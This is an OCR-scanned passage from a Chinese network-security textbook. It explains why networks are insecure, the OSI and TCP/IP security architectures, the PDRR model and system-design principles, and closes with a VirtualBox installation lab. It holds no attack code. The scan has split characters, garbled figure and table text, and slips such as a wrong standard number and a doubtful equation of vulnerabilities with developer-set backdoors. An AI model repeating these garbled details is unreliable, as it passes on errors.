团队 往往 需要 付出 很 高 的 代价 ,普通 的 企 事业 单位 往往 难以 接受 。 将 网 络 系统 安全 加 固 任 
务 外 包 给 专门 从 事 网 络 安全 服务 的 公司 去 完成 ,逐渐 成 为 一 种 行 之 有 效 的 方法 ,这 就 是 所 谓 
的 网 络 安全 服务 。 网 络 安全 服务 实际 上 是 网 络 安全 设计 动态 特性 的 延伸 ,也 是 网 络 安全 产 
业 分 工 的 结果 。 作 为 一 种 新 的 技术 ,网 络 安全 服务 同样 需要 工具 和 规范 的 支持 。 网 络 安全 
服务 企业 定期 评估 客户 网 络 系统 面临 的 风险 ,利用 各 种 补丁 加 固 客户 的 网 络 系统 ,为 客户 提 
供 有 效 的 安全 网 络 管理 方案 。 此 外 ,网 络 安全 服务 企业 还 负责 对 客户 的 网 络 系统 建设 方案 
进行 安全 评估 ,对 客户 企业 员工 进行 安全 培训 等 。 


1.3 网 络 不 安全 的 原因 


网 络 不 安全 的 原因 主要 有 以 下 几 个 方面 。 

1. 系统 漏洞 

系统 漏洞 又 称 为 陷阱 ,是 导致 网 络 不 安全 的 重要 原因 之 一 。 它 通常 是 由 操作 系统 开发 
者 设置 的 ,这 样 他 们 就 能 够 在 用 户 失去 了 对 操作 系统 的 所 有 访问 权时 仍 能 进入 操作 系统 ,这 
就 像 汽 车 上 的 安全 门 一 样 ,平时 不 使 用 ,但 在 发 生 灾难 或 正常 门 被 封闭 的 特殊 情况 下 ,人 可 
以 使 用 安全 门 逃 生 。 如 果 黑 客 利用 系统 漏洞 对 网 络 计算 机 的 操作 系统 实施 攻击 ,将 导致 计 
算 机 信息 的 泄露 和 丢失 。 


2. 安全 漏洞 

安全 漏洞 是 在 硬件 ,软件 ,协议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ,从 而 可 以 使 
攻击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 漏 洞 会 影响 到 很 大 范围 的 软 硬 件 设备 , 包 
括 操作 系统 本 身 及 其 支撑 软件 ,网 络 客户 和 服务 器 软件 ,网 络 路 由 器 和 安全 防火 墙 等 。2018 
年 1 月 爆 出 了 英特尔 (Intel) 中 央 处 理 器 (CPU) 中 的 Meltdown 和 Spectre 漏洞 ,这 次 的 漏洞 之 
所 以 受到 全 球 广泛 关注 ,是 因为 这 些 漏 洞 能 让 恶意 程序 获取 核心 内 存 中 存储 的 敏感 内 容 , 如 能 
导致 黑客 访问 到 个 人 计算 机 的 内 存 数据 ,包括 用 户 账号 密码 ,应 用 程序 文件 ,文件 缓存 等 信息 。 

3. 协议 的 开放 性 

目前 ,TCP/IP 协议 是 应 用 最 广泛 的 网 络 协议 ,但 由 于 TCP/IP 本 身 的 开放 性 特点 ,在 
设计 过 程 中 没有 对 具体 的 安全 问题 给 予 详细 分 析 ,导致 现行 的 IP 网 络 存在 明显 的 安全 缺 
陷 , 成 为 网 络 安全 隐患 中 最 核心 的 问题 。 最 常见 的 隐患 有 SYN-Flood 攻击 、ICMP 攻击 、 
DoS 攻击 ,DDoS 攻击 IP 地 址 盗用 、 源 路 由 攻击 及 截取 连接 攻击 等 。 

在 电子 商务 领域 中 ,信息 安全 的 问题 变 得 尤为 突出 。 在 电子 交易 过 程 中 ,企业 和 用 户 的 
数据 是 以 数据 包 的 形式 来 传送 的 ,恶意 攻击 者 可 以 很 容易 地 对 某 个 电子 商务 网 站 开展 数据 
包 拦截 ,甚至 对 数据 包 进 行 修改 和 假冒 。 

4. 人 为 因素 

(1) 人 为 的 偶然 失误 。 如 操作 人 员 配 置 不 合理 导致 的 安全 漏洞 ; 用 户 信息 安全 意识 淡 
薄 或 用 户口 令 设 置 不 当 , 将 自己 的 账号 违规 转借 给 同事 或 与 他 人 共享 等 ,都 会 使 网 络 变 得 不 
够 安全 。 由 此 可 见 ,操作 人 员 应 该 认真 地 执行 安全 策略 ,减少 人 为 因素 或 操作 不 当 而 给 信息 
系统 带 来 不 必要 的 风险 或 损失 。 

(2) 计算 机 犯罪 。 网 络 病毒 可 能 突破 网 络 的 防御 体系 ,感染 网 络 的 服务 器 ,严重 地 破坏 
服务 器 上 的 信息 资源 ,甚至 导致 网 络 信息 系统 的 全 面瘫 痪 。 目 前 ,网 络 病毒 主要 通过 网 页 、 
邮件 和 文件 下 载 的 方式 传播 ,感染 整个 计算 机 网 络 ,给 管理 信息 系统 和 计算 机 网 络 带 来 灾难 
性 的 破坏 。 有 些 病毒 还 会 删除 与 安全 相关 的 软件 或 系统 文件 ,导致 系统 运行 异常 甚至 造成 

(3) 黑客 攻击 。 计 算 机 软件 往往 存在 不 少 的 缺陷 和 漏洞 ,网络 黑客 通常 利用 这 些 漏洞 
和 缺陷 开展 针对 网 络 计 算 机 的 攻击 。 黑 客 利用 网 络 协议 或 恶意 软件 ,扫描 整个 网 络 或 子 网 ， 
寻找 存在 系统 安全 缺陷 的 主机 ,然后 在 该 主机 上 植 入 木马 ,一 旦 取得 主机 系统 的 控制 权 后 ， 
就 可 以 在 系统 上 随意 操作 ,包括 在 系统 上 建立 新 的 后 门 程序 或 植 人 木马 。 


1.4 信息 安全 体系 结构 


1.4.1 OSI 安全 体系 结构 


在 1983 年 ,国际 标准 化 组 织 (ISO) 制 定 了 ISO 7498 标准 ,在 计算 机 网 络 通信 和 领域 提出 
了 开放 系统 互联 COpen System Interconnect,.OSI) 参 考 模型 。 这 一 标准 将 网 络 通信 协议 分 
为 7 层 , 从 低 到 高 包含 物理 层 ( 第 1 层 ) .数据 链 路 层 (第 2 层 )、 网 络 层 (第 3 层 ) 传输 层 ( 第 4 
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层 ) 会 话 层 ( 第 5 层 )、 表 示 层 (第 6 层 ) 和 应 用 层 ( 第 7 层 ) ,成 为 计算 机 网 络 标准 化 的 纲领 性 
交 件 5 

为 了 增强 OSI 参考 模型 的 安全 性 ,ISO 在 1988 年 提出 了 ISO 7489-2 标准 ,提高 了 
ISO7498 标准 的 安全 等 级 , 它 提出 了 网 络 安全 系统 的 体系 结构 , 它 和 以 后 相应 的 安全 标准 给 
出 的 网 络 信息 安全 架构 被 称 为 OSI 安全 体系 结构 。OSI 安全 体系 结构 指出 了 计算 机 网 络 
需要 的 安全 服务 和 解决 方案 ,并 明确 了 各 类 安全 服务 在 OSI 网 络 层 次 中 的 位 置 ,这 种 在 不 
同 网 络 层次 满足 不 同安 全 需求 的 技术 路 线 对 后 来 网 络 安全 的 发 展 起 到 了 重要 的 作用 。 

表 1-1 给 出 了 OSI 安全 体系 结构 规定 的 主要 安全 服务 及 其 实现 机 制 和 所 处 的 网 络 层 
次 。 从 标准 中 看 ,OSI 的 “底层 网 络 安全 协议 ”在 第 1 一 4 层 中 实现 ,主要 包括 网 络 层 安 全 协 
议 (Network Layer Security Protocol, NLSP) 和 传输 层 安 全 协议 (Transportation Layer 
Security Protocol,TLSP); OSI 的 “安全 组 件 ” 服 务 在 第 5 一 7 层 中 实现 ,主要 包括 安全 通信 
组 件 和 系统 安全 组 件 ,前 者 负责 与 安全 相关 的 信息 在 系统 之 间 的 传输 ,后 者 负责 与 安全 相关 
的 处 理 ,如 加 密 、 解 密 、 数 字 签 名 、 认 证 等 。 在 表 1-1 中 ,路 由 控制 实际 上 是 指 在 网 络 设备 上 
进行 的 安全 处 理 , 选 择 字段 机 密 性 或 选择 字段 完整 性 是 指 在 应 用 中 仅 有 部 分 信息 是 需要 保 
密 或 不 允许 修改 的 。 


表 1-1 OSI 安全 体系 结构 定义 的 主要 安全 服务 情况 


安全 服务 实现 机 制 网 络 层次 
对 等 实体 认证 认证 、 签 名 加密 3,4.7 
数据 起 源 认证 签名 、 加 密 3.4.7 
访问 控制 认证 授权 与 访问 控制 3,4.7 
连接 机 密 性 路 由 控制 .加密 1.2.3.4.6、7 
无 连接 机 密 性 路 由 控制 ,加密 2、3、4\6S7 
选择 字段 机 密 性 加 密 6.7 
连接 完整 性 完整 性 验证 ,加 密 4、7 
无 连接 完整 性 完整 性 验证 、 签 名、 加密 3、4.7 
选择 字段 连接 完整 性 完整 性 验证 ,加 密 7 
选择 字段 无 连接 完整 性 完整 性 验证 、 签 名、 加密 7 
数据 源 非 否认 第 三 方 公正 、 完 整 性 验证 、 签 名 7 
传递 过 程 非 否认 第 三 方 公正 ,完整 性 验证 ,签名 7 


从 表 1-1 可 以 看 出 ,不 同 的 网 络 协议 栈 层 次 可 以 实现 相同 的 安全 需求 。 网 络 安全 体系 
设计 者 在 实现 安全 功能 的 网 络 层次 方面 主要 应 该 考虑 : 从 成 本 、 通 用 性 和 适用 性 等 角度 来 
分 析 , 尽 可 能 在 较 低 的 网 络 协议 栈 层 次 实现 这 些 需求 ; 此 外 ,一 些 实现 条 件 要 求 或 约束 使 安 
全 性 必须 在 更 高 的 网 络 层 次 实现 。 综 合 来 看 .OSI 安全 体系 结构 中 的 安全 服务 能 够 为 网 络 
系统 提供 以 下 4 类 不 同 层次 的 安全 性 ,如 图 1-3 所 示 。 

1. 应 用 级 安全 

与 应 用 直接 联系 的 安全 需求 必须 在 应 用 层 实现 ,主要 包括 被 保护 数据 存在 语义 相关 和 
中 继 的 情形 。 在 这 些 情形 下 ,OSI 安全 组 件 运 用 各 种 信息 安全 技术 保障 应 用 层 数 据 的 安全 
性 ,实现 的 安全 性 被 称 为 应 用 级 安全 。 

被 保护 数据 存在 语义 相关 通常 是 指 信息 安全 系统 需要 了 解数 据 的 一 些 情况 或 此 数据 与 


应 用 级 安全 
表示 层 

会 话 层 

传输 层 着 洒 统 级 安 多 传输 层 
网 络 级 安全 人 

链 路 级 安全 和 

物理 导 


图 1-3 OSI 安全 体系 结构 4 个 主要 的 安全 结构 层 


其 他 数据 的 关系 后 方 可 对 此 数据 进行 保护 。 典 型 地 ,很 多 应 用 仅 要 求 保护 一 部 分 数据 ,数据 
存在 安全 保护 范围 的 问题 ,因此 安全 保护 需要 设置 不 同 的 操作 粒度 。 在 OSI 安全 体系 结构 
中 ,这 类 应 用 被 称 为 需要 选择 字段 非 否认 性 选择 字 段 完整 性 .选择 字段 机 密 性 等 ,显而易见 
的 是 ,这 些 随 不 同 应 用 而 不 同 的 处 理 无 法 在 更 低 的 网 络 层次 实现 。 

被 保护 数据 存在 中 继 是 指 在 数据 传输 过 程 中 继 系统 需要 获得 、 处 理 并 继续 传输 由 应 用 
层 包 右 着 的 数据 。 在 这 种 情况 下 ,中 继 系 统 需 要 打开 数据 包 的 应 用 层 , 然 后 处 理 或 转换 数据 
包 中 的 数据 。 因 此 , 若 在 网 络 较 低 层次 实现 安全 机 制 , 需 要 把 这 些 中 继 系统 包含 进来 ,这 实 
现 起 来 非常 困难 。 例 如 ,一 个 网 上 银行 的 应 用 试图 通过 加 密 数 据 包 的 手段 保护 数据 包 的 内 
容 , 但 数据 包 必须 经 过 发 送 和 接收 服务 器 中 继 , 但 要 把 所 有 可 能 的 这 类 服务 器 都 包括 进 安全 系 
统 是 非常 不 容易 的 ,为 了 实现 任何 地 域 之 间 的 网 上 银行 业务 ,需要 在 应 用 层 解 决 安全 问题 。 

2. 端 系统 级 安全 

当 安 全 构件 在 介 于 应 用 层 和 网 络 层 之 间 的 层次 实现 时 ,网 络 系统 得 到 了 端 系统 级 安全 ， 
即 OSI 安全 体系 结构 满足 了 端 系统 到 端 系统 之 间 的 通信 安全 。 一 些 对 通信 安全 要 求 较 高 
的 场合 适合 采用 端 系统 级 安全 ,这 里 的 安全 通信 不 仅 面向 所 有 的 应 用 ,而 且 以 一 种 安全 的 方 
式 满足 相应 网 络 层 次 的 功能 。 

应 用 的 设计 者 可 能 怀疑 网 络 的 可 信 程 度 , 此 时 需要 在 网 络 上 实现 系统 级 安全 性 。 网 络 不 
可 信 存 在 的 原因 包括 内 部 网 络 出 现 威胁 、 无 法 控制 网 络 设备 ,不 方便 改造 网 络 设备 等 情况 。 

(1) 内 部 网 络 出 现 威胁 是 指 即使 网 络 之 间 存在 安全 的 通信 ,仍然 可 能 出 现 信息 在 内 部 
网 络 中 被 窃取 的 情况 ,在 要 求 高 安全 性 的 场合 下 ,应 该 满足 端 系 统 级 安全 。 

(2) 无 法 控制 网 络 设备 是 指 应 用 难以 使 用 网 络 设 备 保护 通信 的 安全 。 例 如 ,铁路 购 票 
系统 在 设计 时 不 能 假设 购 票 者 处 在 特定 的 网 络 中 ,因此 有 必要 保证 购 票 者 的 计算 机 到 系统 
服务 器 之 间 端 到 端的 数据 安全 。 

(3) 不 便于 改造 网 络 设备 的 情形 类 似 前 两 种 情况 ,一般 当 受 保护 的 数据 流量 较 小 时 , 即 
使 在 固定 的 网 络 之 间 安 全 通信 ,实现 端 系统 级 安全 往往 代价 更 低 。 

目前 ,OSI 端 系统 级 安全 的 思想 已 经 渗透 到 TCP/IP 网 络 中 的 安全 套 接 字 和 安全 
HTTP 等 实用 协议 中 。 

3. 网 络 级 安全 

OSI 安全 体系 规定 : 网 络 层 提供 的 安全 功能 负责 实现 网 络 到 网 络 之 间 的 安全 通信 , 获 
得 网 络 级 安全 。 此 外 ,OSI 规范 还 规定 : 分 布 于 不 同 地 理 位 置 上 的 网 络 是 Internet 的 子 网 ， 
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因此 网 络 级 安全 也 称 为 子 网 级 安全 。 
网 络 级 安全 的 应 用 范围 广泛 。 首 先 , 它 可 以 避免 在 每 个 端 系统 中 都 安装 安全 构件 ,节省 
了 网 络 部 署 成 本 ; 其 次 ,实现 网 络 级 安全 也 可 以 配合 少量 端 系统 级 安全 的 应 用 ,达到 安全 保 
障 体系 主 次 分 明 的 目标 ; 最 后 , 当 收 发 信息 双方 的 内 部 网 络 能 够 保证 可 靠 时 ,满足 了 网 络 级 
安全 就 等 价 于 实现 了 通信 的 安全 。 目 前 ,OSI 网 络 级 安全 框架 的 思想 已 经 渗透 到 虚拟 专用 
网 、Internet 安全 协议 族 IPSec 等 协议 中 。 

4. 链 路 级 安全 

为 了 在 信息 传输 中 透明 地 保护 全 部 的 高 层 协议 通信 ,安全 应 用 的 设计 者 可 以 在 链 路 层 
保护 通信 帧 的 内 容 ,这 样 就 能 够 实现 链 路 级 安全 。 但 这 种 策略 只 适合 点 到 点 通信 的 情形 , 因 
为 在 这 种 情况 下 ,有 限 的 连接 点 被 认为 是 可 信赖 的 。 例 如 , 链 路 层 保护 适合 大 型 网 络 通信 中 
心 之 间 的 数据 传输 。 但 在 Internet 中 ,无 论 从 连接 点 的 可 信 性 还 是 从 实施 代价 来 说 , 链 路 层 
保护 显然 难以 实施 。 


1.4.2 TCP/IP 安全 体系 结构 


TCP/IP 协议 族 在 设计 之 初 并 没有 认真 地 考虑 网 络 安全 功能 ,为 了 解决 TCP/IP 协议 
族 带 来 的 安全 问题 ,Internet 工程 任务 组 (IETF) 不 断 地 改进 现 有 协议 和 设计 新 的 安全 通信 
协议 来 对 现 有 的 TCP/IP 协议 族 提供 更 强 的 安全 保证 ,在 互联 网 安全 性 研究 方面 取得 了 丰 
硕 的 成 果 。 由 于 TCP/IP 各 层 协 议 提供 了 不 同 的 功能 ,为 各 层 提 供 了 不 同 层次 的 安全 保证 ， 
因此 专家 们 为 协议 的 不 同 层次 设计 了 不 同 的 安全 通信 协议 ,为 网 络 的 各 个 层次 提供 了 安全 
保障 。 目 前 ,TCP/IP 安全 体系 结构 已 经 制定 了 一 系列 的 安全 通信 协议 ,为 各 个 层次 提供 了 
一 定 程度 上 的 安全 保障 。 这 样 ,由 各 层 安 全 通信 协议 构成 的 TCP/IP 协议 族 的 安全 架构 业 
已 形成 ,如 图 1-4 所 示 。 


SNMP PGP S/MIME PEM 
应 
SET IKE TELNET HTTPS 用 
层 
X.509 RIPv2 SNMPv3 BGP-4 
SSL TLS 传 
poppin tnd tn dt 输 
1 TCP 六 下 UDP 1 县 
上 一 一 一 一 一 一 一 一 一 一 一 一 一 一 了 让 一 一 一 一 一 一 一 一 一 一 一 一 一 一 ] 
IPSec(AH) JPSec(ESP) 网 
es -4 络 
1 IP ! 层 
pe ee pe et ee ee Se ee af ee ee Se en ee 
RIP L2TP PP L2F 链 
re re et -。 路 
硬件 设备 驱动 程序 及 介质 介入 协议 1 县 


图 1-4 TCP/IP 的 安全 体系 结构 
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(1) 数据 链 路 层 安全 通信 协议 为 通过 通信 链 路 连接 起 来 的 主机 或 路 由 器 之 间 的 安全 提 
供 了 保证 ,PPTP、L2TP 是 主要 的 数据 链 路 层 安全 通信 协议 。 数 据 链 路 层 安全 通信 协议 拥 
有 较 高 的 效率 ,但 是 通用 性 和 扩展 性 较 差 。 

(2) 网 络 层 安全 通信 协议 旨 在 解决 网 络 层 通信 中 产生 的 安全 问题 ,对 TCP/IP 协议 而 
言 ,主要 解决 IP 协议 中 存在 的 安全 问题 。 目 前 ,IPSec 是 最 重要 的 网 络 层 安 全 通信 协议 。 
网 络 层 安全 通信 协议 对 网 络 层 以 上 各 层 透 明 ,但 是 难以 提供 不 可 否认 服务 。 

(3) 传输 层 安 全 通信 协议 的 目标 是 在 端 系统 为 传输 层 提供 安全 通信 ,SSL 和 TLS 是 重 
要 的 传输 层 安全 通信 协议 。 它 可 以 在 进程 与 进程 之 间 实 现 安全 通信 ,但 是 需要 修改 对 应 程 
序 , 同 时 也 不 能 提供 透明 的 安全 保障 。 

(4) 应 用 层 安全 通信 协议 是 根据 某 些 特定 应 用 (电子 邮件 .电子 交易 等 ) 的 安全 需求 而 
设计 的 安全 协议 。S/MIME、PGP、SET、SNMP 和 HTTPS 是 主要 的 应 用 层 安 全 通信 协议 
这 些 协议 必须 在 端 系统 及 主机 上 应 用 。 应 用 层 安 全 通信 协议 可 以 密切 地 结合 具体 应 用 的 安 
全 需求 提供 个 性 化 的 安全 服务 ,但 是 每 种 安全 机 制 只 是 针对 某 种 特定 的 应 用 。 应 该 综合 
考虑 应 用 对 安全 保密 的 具体 要 求 及 每 一 层 实 现 安全 功能 的 特点 ,来 决定 在 某 一 层次 究竟 采 
用 什么 样 的 安全 通信 协议 。 


1.4.3 信息 安全 保障 体系 


“信息 安全 保障 体系 ”为 信息 系统 安全 体系 提供 了 一 个 完整 的 设计 理念 ,同时 较 好 地 诠 
释 了 安全 保障 的 内 涵 。 信 息 安全 保障 体系 ,包含 四 
部 分 内 容 , 即 人 们 所 熟知 的 PDRR ,如 图 1-5 所 示 。 

1. 保护 

所 谓 保护 Cprotect) ,就 是 指 预先 采取 安全 防范 
措施 ,迫使 产生 攻击 的 条 件 无 法 形成 ,让 攻击 者 无 人 
法 实施 入侵 信息 系统 的 行为 。 保 护 属于 被 动 防御 ， 
无 法 彻底 地 阻止 各 种 针对 信息 系统 的 攻击 行为 。 
主要 的 安全 保护 技术 包括 网 络 安全 技术 、 信 息 保密 
技术 .操作 系统 安全 技术 .物理 安全 防护 .访问 控制 
技术 及 病毒 预防 技术 等 。 0 

2. 检测 

所 谓 检测 (detect) ,是 指 根据 有 关 的 安全 策略 ,采取 相应 的 技术 手段 ,针对 可 能 被 入侵 
者 利用 的 信息 系统 的 脆弱 部 分 进行 具有 -一定 实时 性 的 检查 ,同时 将 结果 形成 检测 报告 。 主 
要 的 检测 技术 包括 入侵 检测 、 恶 意 代码 检测 .脆弱 性 扫描 等 。 

3. 反应 

所 谓 反 应 (react) ,是 指 对 于 破坏 系统 安全 性 的 事件 、 行 为. 过程 及 时 做 出 适当 的 响应 处 
理 ,避免 危害 的 后 果 进 一 步 的 恶化 ,使 信息 系统 的 损失 减 到 最 小 。 主 要 的 反应 技术 包括 报 
警 、 跟 踪 、 阻 断 、 隔 离 及 反击 等 相关 技术 。 反 击 又 可 分 为 取证 和 打击 ,其 中 取证 是 根据 相关 法 
律 法 规 搜集 入 侵 者 的 犯罪 证 据 ,而 打击 是 采用 合法 手段 反 制 人 侵 者 。 


保护 检测 


恢复 反应 
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4. 恢复 


所 谓 恢复 (restore) ,是 指 当 危害 事件 发 生 后 把 信息 系统 恢复 到 原来 的 状态 或 比 原来 更 
安全 的 状态 ,降低 对 信息 系统 造成 的 损失 。 主 要 的 恢复 技术 包括 异常 恢复 、 应 急 处 理 、 漏 洞 
修补 、 系 统 和 数据 备份 及 人 侵 容 忍 等 。 

保护 ,检测 ,反应 和 恢复 是 信息 安全 保障 的 子 过 程 ,这 4 个子 过 程 构成 了 信息 安全 保障 
这 一 完整 的 动态 过 程 。 如 图 1-6 所 示 , 这 些 子 过 程 分 别 在 攻击 者 发 动 攻击 的 不 同 阶 段 为 信 
息 系统 提供 保障 。 保 护 是 最 基本 的 被 动 防御 手段 , 即 信息 系统 的 外 围 防 线 ; 检测 的 目的 是 
针对 突破 “外 围 防线 ”后 的 攻击 行为 进行 探测 预警 ; 反应 是 在 接 到 检测 报警 后 针对 攻击 采取 
的 控制 手段 ; 恢复 是 针对 攻击 入 侵 引 起 的 破坏 后 果 进 行 补救 ,是 最 后 的 降低 危害 的 方法 ,如 
果 前 面 的 保障 过 程 有 效 地 控制 了 入 侵 行 为 , 则 恢复 过 程 无 须 启动 。 


检测 失败 


保护 成 功 


保 | 保护 失败 
护 


攻击 
反应 成 功 
图 1-6 PDRR 模型 安全 保障 动态 过 程 示 意图 


1.4.4 网 络 信息 安全 系统 设计 原则 


网 络 信息 安全 系统 在 设计 过 程 中 应 该 遵循 以 下 9 项 原则 。 

1. 木 桶 原则 

木 桶 的 最 大 容积 取决 于 最 短 的 一 块 木 板 , 木 桶 原则 旨 在 对 网 络 信息 进行 均衡 的 保护 。 
网 络 信息 系统 异常 复杂 , 它 的 安全 脆弱 性 源 于 物理 上 操作 上 和 管理 上 的 漏洞 。 单 纯 的 技术 
防护 无 法 满足 多 用 户 网 络 信息 系统 的 复杂 性 和 资源 共享 性 的 要 求 。 攻 击 者 往往 选择 系统 最 
薄弱 的 地 方 进行 攻击 ,这 是 设计 网 络 信息 安全 系统 时 需要 注意 的 问题 。 因 此 ,科学 地 设计 网 
络 信息 安全 系统 需要 进行 全 面 的 分 析 , 评 估 和 检测 信息 系统 所 面临 的 安全 威胁 。 

2. 整体 性 原则 

整体 性 原则 要 求 在 网 络 面临 攻击 的 情况 下 , 尽 可 能 快速 恢复 网 络 信 息 中 心服 务 。 因 此 ， 
信息 安全 系统 应 该 包括 安全 防护 机 制 、 安 全 检测 机 制 和 安全 恢复 机 制 。 安 全 防护 机 制 旨 在 
采取 一 定 的 防护 措施 ,以 应 对 具体 系统 面临 的 各 种 安全 威胁 ; 安全 检测 机 制 通过 实时 监测 
信息 系统 的 运转 情况 ,及 时 处 理 针 对 系统 的 攻击 行为 ; 安全 恢复 机 制 属 于 应 急 处 理 的 范畴 ， 
是 指 在 安全 防护 机 制 失效 的 情况 下 ,尽快 地 进行 系统 信息 恢复 ,减少 系统 损失 。 

3. 安全 性 评价 与 平衡 原则 

任何 网 络 都 无 法 实现 绝对 的 安全 ,因此 有 必要 建立 合理 的 实用 安全 性 与 用 户 需求 评价 
和 平衡 体系 。 正 确 地 处 理 用 户 需求 、 网 络 风险 与 系统 代价 的 关系 是 网 络 信息 安全 系统 设计 
的 关键 ,此 外 在 进行 安全 系统 设计 时 .需要 做 到 系统 的 安全 性 与 可 用 性 相 容 ,达到 组 织 上 可 
执行 。 可 以 根据 以 下 3 个 方面 来 评估 网 络 信 息 的 安全 性 : 网 络 用 户 需 求 和 网 络 信 息 应 用 环 
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境 , 计 算 机 网 络 的 规模 ,网 络 信息 的 重要 程度 。 

4. 标准 化 与 一 致 性 原则 

网 络 信息 安全 系统 设计 是 一 个 庞大 的 系统 工程 ,其 设计 过 程 必须 遵循 一 系列 标准 ,这 样 
才能 够 保证 各 个 分 系统 一 致 的 工作 ,整个 系统 安全 地 实现 了 互联 互通 和 信息 共享 。 

5. 技术 与 管理 相 结合 原则 

网 络 信息 安全 系统 设计 是 一 个 复杂 的 系统 工程 ,涉及 人 员 技术 和 操作 等 诸多 因素 , 缺 
少 任 何 一 个 要 素 这 项 工程 都 不 可 能 完成 。 因 此 ,在 设计 网 络 信息 安全 系统 时 ,设计 者 应 该 将 
系统 安全 技术 与 运行 管理 机 制 、 操 作者 技术 培训 、 系 统 安全 规章 制度 建设 紧密 地 结合 起 来 。 

6. 统筹 规划 、 分 步 实施 原则 

由 于 法 规制 定 得 不 完善 ,用 户 需求 又 具有 多 样 性 , 网 络 环境 在 发 生 改 变 ,攻击 手段 也 在 
不 断 进 步 , 因 此 网 络 信息 安全 系统 不 可 能 一 次 性 设计 成 功 。 一 般 来 说 ,设计 者 首先 可 以 制订 
一 个 比较 全 面 的 安全 规划 ,然后 根据 网 络 的 实际 要 求 , 建 立 基本 的 信息 安全 系统 ,为 网 络 提 
供 基本 的 安全 保障 。 随 着 网 络 的 不 断 发 展 , 网 络 应 用 会 变 得 日 趋 复杂 ,计算 机 网 络 也 会 越 来 
越 脆弱 ,此 时 信息 安全 系统 的 设计 者 应 该 增强 网 络 安全 防护 力度 ,以 保证 整个 网 络 最 基本 的 
安全 需求 。 

7. 等 级 性 原则 

等 级 性 原则 是 针对 网 络 安全 层次 和 网 络 安全 级 别 而 言 的。 网 络 信息 安全 系统 可 以 分 为 
不 同 的 等 级 ,等 级 的 划分 标准 包括 信息 保密 程度 、 用 户 操作 权限 、 网 络 安全 程度 及 系统 实现 
结构 。 网 络 信息 安全 系统 的 设计 者 可 以 针对 不 同等 级 的 安全 对 象 , 确 定 相 应 的 安全 机 制 , 以 
满足 网 络 中 不 同 层次 用 户 的 实际 需求 。 

8. 动态 发 展 原则 

动态 发 展 原则 是 指 不 断 改 进 安全 措施 ,适应 新 的 网 络 安全 环境 ,满足 现实 的 网 络 安全 

9. 易 操作 性 原则 

首先 ,网 络 信息 安全 系统 要 求 手工 进行 操作 ,如 果 系 统 设计 得 比较 复杂 , 则 操作 者 误 操 
作 的 可 能 性 增 大 ,这样 网 络 信息 安全 系统 的 可 靠 性 就 降低 了 。 其 次 ,安装 网 络 信息 安全 系统 
不 应 该 影响 计算 机 网 络 的 正常 运转 。 


《ED Windows 10 系统 下 安装 虚拟 机 


/ 实 训 目的 

1. 掌握 在 Windows 10 系统 下 如 何 安装 虚拟 机 。 
2. 能 够 熟练 地 使 用 配置 好 的 虚拟 机 。 

/ 实 训 环境 


1. 设备 : 计算 机 。 
2. 软件 : Windows 10、VirtualBox 5. 0。 
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/ 实 训 内 容 

1. Windows 10 系统 下 VirtualBox 5.0 的 安装 。 

2. VirtualBox 软件 的 配置 。 

V 实 训 步 村 

1. Windows 10 系统 下 VirtualBox 5.0 的 安装 

(1) 打开 Windows 10 自 带 的 浏览 器 Edge, 打 开 百 度 搜索 网 站 ,在 百度 搜索 框 中 输入 
“VirtualBox”, 单 击 “ 百 度 一 下 ”按钮 ,在 打开 的 百度 软件 中 心 的 官方 网 站 上 单 击 “ 普 通 下 载 ” 
按钮 ,将 该 软件 下 载 到 计算 机 中 ,如 图 1-7 所 示 ; 或 者 到 VirtualBox 官网 下 载 该 软件 ,下 载 
地 址 为 http://www. virtualbox. org/wiki/Downloads。 之 所 以 选择 VirtualBox 软件 ,是 因 
为 该 软件 体积 小 巧 、 免 费 、 功 能 简单 实用 且 有 中 文 版 本 。 


园 Vtwalsox 和 xX = 
3 | 让 Ee 


A 
Baj 六 EE 度 VirtualBox 


电脑 拷 ”Androld 晰 Mac 所 
Wt: 50145127 
NG 大 小 ; 1118M 


更 新 : 2016-02-25 


图 1-7 VirtualBox 的 下 载 


(2) 下 载 完成 后 双击 打开 VirtualBox-5. 0. 20-Win 程序 , 单 击 Next 按钮 ,如 图 1-8 所 示 。 


期 Oracle VM VinuslBox 5.0.20 Setup 


Welcome to the Oracle VM 
`“ VirtualBox 5.0.20 Setup 
Wizard 
The Setup Wizard wil rstal Drade YM VrtuaBox 5.0,20 on 
Cick Next to continue of Cancel to exit the 


图 1-8 ”VirtualBox 的 安装 向 导 


篇 
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(3) 选择 要 安装 的 组 件 , 如 果 有 不 需要 安装 的 , 则 单 击 三 角 下 拉 按 钮 ,在 打开 的 列表 中 
选中 相应 的 组 件 即 可 。 然 后 单 击 Browse 按钮 ,选择 该 软件 的 安装 位 置 ,默认 安装 在 C 盘 ， 
建议 安装 到 非 系 统 盘 。 然 后 再 次 单 击 Next 按钮 ,如 图 1-9 所 示 。 


期 orade VM VirtualBox 5.0.20 Setup 
Custom Setup 
Select the Way you want features to be nstaled, 


Ack on the cons in the tree below to dhange the way features w be rstaled. 


一 各 7| WaBox Applcation 


De eh 必 der 人 人 
中 十 号 Will be iltd led on ldcal hard drive 


图 1-9 选择 安装 组 件 
(4) 选中 需要 软件 ,创建 桌面 快捷 方式 ,如 图 1-10 所 示 ,然后 单 击 Next 按钮 。 


期 Oradle VM VirtualBox 5.0.20 Setup 
Custom Setup 
Select the way you ment features to be nstoled, 


Please choose from the opions below: 


create a shortcut on the desktop 
create 3 shorteut n he Quick Laundh Be 


Register fle associations 


图 1-10 创建 桌面 快捷 方式 
(5) 单 击 Yes 按钮 ,如 图 1-11 所 示 。 
(6) 单 击 Install 按钮 开始 安装 ,如 图 1-12 所 示 。 


(7) 弹出 用 户 控 制 对 话 框 , 单 击 “ 是 ”按钮 。 后 开始 安装 ,并 显示 一 个 安装 进度 条 。 这 时 
不 需要 进行 其 他 操作 。 
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Warning: 
Network Int@faces 


Instaling the Orade YM x 5.0,20 Networking 
fosre wi reset yo connecion and temporarly 


Proceed with nstalaton 


图 1-11 单 击 Yes 按钮 


划 Oradle VM VirtualBox 5.0.20 Setup 


Ready to Install 
The Setup Wizard is ready to begin the Custom installation, 


5 


Cidk Instal to begin the nstalation, 
Instalaton settings, didk Back. Cick 


图 1-12 单 击 Install 按钮 


(8) 单 击 Finish 按钮 完成 安装 。 

2. VirtualBox 软件 的 配置 

(1) 选择 “管理 ”一 “全 局 设 定 ” 命 令 , 如 图 1-13 所 示 。 

